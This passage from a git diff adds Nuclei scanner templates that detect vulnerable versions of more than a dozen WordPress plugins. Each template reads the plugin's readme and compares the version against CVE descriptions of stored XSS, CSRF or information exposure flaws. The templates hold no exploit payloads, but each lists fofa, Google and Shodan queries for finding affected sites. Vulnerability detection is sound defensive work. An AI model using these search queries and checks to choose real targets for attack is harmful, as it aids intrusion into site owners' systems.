+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "fastbook-responsive-appointment-booking-and-scheduling-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53763-1664f5785c3962b04d39cbb880af99a4.yaml b/poc/cve/CVE-2024-53763-1664f5785c3962b04d39cbb880af99a4.yaml
new file mode 100644
index 0000000000..1ceb858114
--- /dev/null
+++ b/poc/cve/CVE-2024-53763-1664f5785c3962b04d39cbb880af99a4.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53763-1664f5785c3962b04d39cbb880af99a4
+
+info:
+ name: >
+ Best Addons for Elementor <= 1.0.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Best Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/559165ed-f7f6-4f5a-ad37-8a2d53924888?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53763
+ metadata:
+ fofa-query: "wp-content/plugins/best-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/best-addons-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-53763'
+ tags: cve,wordpress,wp-plugin,best-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/best-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "best-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53764-d38ed8a49a12e2b84a3819c47c303668.yaml b/poc/cve/CVE-2024-53764-d38ed8a49a12e2b84a3819c47c303668.yaml
new file mode 100644
index 0000000000..9ae847d88c
--- /dev/null
+++ b/poc/cve/CVE-2024-53764-d38ed8a49a12e2b84a3819c47c303668.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53764-d38ed8a49a12e2b84a3819c47c303668
+
+info:
+ name: >
+ Softtemplates For Elementor <= 1.0.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Softtemplates For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0db63414-b8c3-41bf-a6df-4b6113ea7388?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53764
+ metadata:
+ fofa-query: "wp-content/plugins/softtemplates-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/softtemplates-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-53764'
+ tags: cve,wordpress,wp-plugin,softtemplates-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/softtemplates-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "softtemplates-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53765-1c8351ea02e8d70b52879086ddd276a2.yaml b/poc/cve/CVE-2024-53765-1c8351ea02e8d70b52879086ddd276a2.yaml
new file mode 100644
index 0000000000..712e2a8d90
--- /dev/null
+++ b/poc/cve/CVE-2024-53765-1c8351ea02e8d70b52879086ddd276a2.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53765-1c8351ea02e8d70b52879086ddd276a2
+
+info:
+ name: >
+ Mins To Read <= 1.2.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Mins To Read plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5a595e05-c017-4f6a-995d-a6226c5a19b1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53765
+ metadata:
+ fofa-query: "wp-content/plugins/mins-to-read/"
+ google-query: inurl:"/wp-content/plugins/mins-to-read/"
+ shodan-query: 'vuln:CVE-2024-53765'
+ tags: cve,wordpress,wp-plugin,mins-to-read,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mins-to-read/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mins-to-read"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53766-2940cf0523c9b377de42a03a2c813390.yaml b/poc/cve/CVE-2024-53766-2940cf0523c9b377de42a03a2c813390.yaml
new file mode 100644
index 0000000000..734a1e08d9
--- /dev/null
+++ b/poc/cve/CVE-2024-53766-2940cf0523c9b377de42a03a2c813390.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53766-2940cf0523c9b377de42a03a2c813390
+
+info:
+ name: >
+ Devnex Addons For Elementor <= 1.0.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Devnex Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c179cb56-6d18-4e04-8539-3834a286e302?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53766
+ metadata:
+ fofa-query: "wp-content/plugins/devnex-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/devnex-addons-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-53766'
+ tags: cve,wordpress,wp-plugin,devnex-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/devnex-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "devnex-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53767-774ba4d9c8507f0511f1d4fe58cfb435.yaml b/poc/cve/CVE-2024-53767-774ba4d9c8507f0511f1d4fe58cfb435.yaml
new file mode 100644
index 0000000000..ac601c1cdc
--- /dev/null
+++ b/poc/cve/CVE-2024-53767-774ba4d9c8507f0511f1d4fe58cfb435.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53767-774ba4d9c8507f0511f1d4fe58cfb435
+
+info:
+ name: >
+ Pixobe Cartography <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Pixobe Cartography plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c6949f9-316c-4e48-a77a-ace793d329ac?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53767
+ metadata:
+ fofa-query: "wp-content/plugins/pixobe-cartography/"
+ google-query: inurl:"/wp-content/plugins/pixobe-cartography/"
+ shodan-query: 'vuln:CVE-2024-53767'
+ tags: cve,wordpress,wp-plugin,pixobe-cartography,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/pixobe-cartography/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pixobe-cartography"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53768-9a3deed242a94103b910250e4c9f9cc6.yaml b/poc/cve/CVE-2024-53768-9a3deed242a94103b910250e4c9f9cc6.yaml
new file mode 100644
index 0000000000..b536e51fab
--- /dev/null
+++ b/poc/cve/CVE-2024-53768-9a3deed242a94103b910250e4c9f9cc6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53768-9a3deed242a94103b910250e4c9f9cc6
+
+info:
+ name: >
+ Content Audit Exporter <= 1.1 - Unauthenticated Sensitive Information Exposure
+ author: topscoder
+ severity: medium
+ description: >
+ The Content Audit Exporter plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba6f8837-813c-4e16-9adb-fdc90ccaf0ca?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-53768
+ metadata:
+ fofa-query: "wp-content/plugins/content-audit-exporter/"
+ google-query: inurl:"/wp-content/plugins/content-audit-exporter/"
+ shodan-query: 'vuln:CVE-2024-53768'
+ tags: cve,wordpress,wp-plugin,content-audit-exporter,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/content-audit-exporter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "content-audit-exporter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53769-15f79e5b8994448885f3d02862f03b54.yaml b/poc/cve/CVE-2024-53769-15f79e5b8994448885f3d02862f03b54.yaml
new file mode 100644
index 0000000000..5a549181e6
--- /dev/null
+++ b/poc/cve/CVE-2024-53769-15f79e5b8994448885f3d02862f03b54.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53769-15f79e5b8994448885f3d02862f03b54
+
+info:
+ name: >
+ Custom Post Type to Map Store <= 1.1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Custom Post Type to Map Store plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ea5c0b48-7e8e-492e-b0de-14681e31fe85?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53769
+ metadata:
+ fofa-query: "wp-content/plugins/cpt-to-map-store/"
+ google-query: inurl:"/wp-content/plugins/cpt-to-map-store/"
+ shodan-query: 'vuln:CVE-2024-53769'
+ tags: cve,wordpress,wp-plugin,cpt-to-map-store,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cpt-to-map-store/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cpt-to-map-store"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53770-dde24fdaf6fdccf92776b21600160051.yaml b/poc/cve/CVE-2024-53770-dde24fdaf6fdccf92776b21600160051.yaml
new file mode 100644
index 0000000000..4664bbb8e9
--- /dev/null
+++ b/poc/cve/CVE-2024-53770-dde24fdaf6fdccf92776b21600160051.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53770-dde24fdaf6fdccf92776b21600160051
+
+info:
+ name: >
+ RingCentral Communications <= 1.6.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The RingCentral Communications Plugin – FREE plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/de4ba999-3312-4bcc-ab87-574b7994e07e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-53770
+ metadata:
+ fofa-query: "wp-content/plugins/rccp-free/"
+ google-query: inurl:"/wp-content/plugins/rccp-free/"
+ shodan-query: 'vuln:CVE-2024-53770'
+ tags: cve,wordpress,wp-plugin,rccp-free,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/rccp-free/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "rccp-free"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53771-3e40a710fce8ae1cf756cfd3c23e5785.yaml b/poc/cve/CVE-2024-53771-3e40a710fce8ae1cf756cfd3c23e5785.yaml
new file mode 100644
index 0000000000..8a7721e4e6
--- /dev/null
+++ b/poc/cve/CVE-2024-53771-3e40a710fce8ae1cf756cfd3c23e5785.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53771-3e40a710fce8ae1cf756cfd3c23e5785
+
+info:
+ name: >
+ SimpleSchema <= 1.7.6.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The SimpleSchema plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.7.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/81500371-93d3-4cee-a992-93d2469f5233?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53771
+ metadata:
+ fofa-query: "wp-content/plugins/simpleschema-free/"
+ google-query: inurl:"/wp-content/plugins/simpleschema-free/"
+ shodan-query: 'vuln:CVE-2024-53771'
+ tags: cve,wordpress,wp-plugin,simpleschema-free,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simpleschema-free/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simpleschema-free"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.6.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53772-277c760c8d8f4930fc51c04bff87c407.yaml b/poc/cve/CVE-2024-53772-277c760c8d8f4930fc51c04bff87c407.yaml
new file mode 100644
index 0000000000..deaa233dd3
--- /dev/null
+++ b/poc/cve/CVE-2024-53772-277c760c8d8f4930fc51c04bff87c407.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53772-277c760c8d8f4930fc51c04bff87c407
+
+info:
+ name: >
+ Mail Picker <= 1.0.14 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Mail Picker plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4b4de145-bff1-4265-97bf-4085b4112a66?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53772
+ metadata:
+ fofa-query: "wp-content/plugins/mail-picker/"
+ google-query: inurl:"/wp-content/plugins/mail-picker/"
+ shodan-query: 'vuln:CVE-2024-53772'
+ tags: cve,wordpress,wp-plugin,mail-picker,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mail-picker/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mail-picker"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.14')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53773-c70474e6b49675474684415b8bad7136.yaml b/poc/cve/CVE-2024-53773-c70474e6b49675474684415b8bad7136.yaml
new file mode 100644
index 0000000000..2d7d5fa178
--- /dev/null
+++ b/poc/cve/CVE-2024-53773-c70474e6b49675474684415b8bad7136.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53773-c70474e6b49675474684415b8bad7136
+
+info:
+ name: >
+ Znajdź Pracę z Praca.pl <= 2.2.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Znajdź Pracę z Praca.pl plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e618025-f631-48af-b360-e11524e61be3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53773
+ metadata:
+ fofa-query: "wp-content/plugins/znajdz-prace-z-pracapl/"
+ google-query: inurl:"/wp-content/plugins/znajdz-prace-z-pracapl/"
+ shodan-query: 'vuln:CVE-2024-53773'
+ tags: cve,wordpress,wp-plugin,znajdz-prace-z-pracapl,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/znajdz-prace-z-pracapl/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "znajdz-prace-z-pracapl"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53774-eb9fe05556006515a14f186abd44c385.yaml b/poc/cve/CVE-2024-53774-eb9fe05556006515a14f186abd44c385.yaml
new file mode 100644
index 0000000000..d5ddebaf76
--- /dev/null
+++ b/poc/cve/CVE-2024-53774-eb9fe05556006515a14f186abd44c385.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53774-eb9fe05556006515a14f186abd44c385
+
+info:
+ name: >
+ Sparkle Elementor Kit <= 2.0.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Sparkle Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.0.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3557cd1e-cfb4-4f08-af3c-be5211a325c1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53774
+ metadata:
+ fofa-query: "wp-content/plugins/sparkle-elementor-kit/"
+ google-query: inurl:"/wp-content/plugins/sparkle-elementor-kit/"
+ shodan-query: 'vuln:CVE-2024-53774'
+ tags: cve,wordpress,wp-plugin,sparkle-elementor-kit,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/sparkle-elementor-kit/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "sparkle-elementor-kit"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53775-27ea91b6010aa9c51cff5259b54c7600.yaml b/poc/cve/CVE-2024-53775-27ea91b6010aa9c51cff5259b54c7600.yaml
new file mode 100644
index 0000000000..d7add19d94
--- /dev/null
+++ b/poc/cve/CVE-2024-53775-27ea91b6010aa9c51cff5259b54c7600.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53775-27ea91b6010aa9c51cff5259b54c7600
+
+info:
+ name: >
+ DancePress (TRWA) <= 3.1.11 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+ The DancePress (TRWA) plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.1.11. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c2bddb3-2b23-4a75-abe2-db787441a1b2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
+ cvss-score: 4.7
+ cve-id: CVE-2024-53775
+ metadata:
+ fofa-query: "wp-content/plugins/dancepress-trwa/"
+ google-query: inurl:"/wp-content/plugins/dancepress-trwa/"
+ shodan-query: 'vuln:CVE-2024-53775'
+ tags: cve,wordpress,wp-plugin,dancepress-trwa,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/dancepress-trwa/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "dancepress-trwa"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.11')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53776-be68d5e8752ad62ee640890ae13d0500.yaml b/poc/cve/CVE-2024-53776-be68d5e8752ad62ee640890ae13d0500.yaml
new file mode 100644
index 0000000000..ef4ac7f334
--- /dev/null
+++ b/poc/cve/CVE-2024-53776-be68d5e8752ad62ee640890ae13d0500.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53776-be68d5e8752ad62ee640890ae13d0500
+
+info:
+ name: >
+ Donate Me <= 1.2.5 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Donate Me plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.5. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7df1901f-fb18-4d1b-ac80-38b676efb64f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53776
+ metadata:
+ fofa-query: "wp-content/plugins/donate-me/"
+ google-query: inurl:"/wp-content/plugins/donate-me/"
+ shodan-query: 'vuln:CVE-2024-53776'
+ tags: cve,wordpress,wp-plugin,donate-me,medium
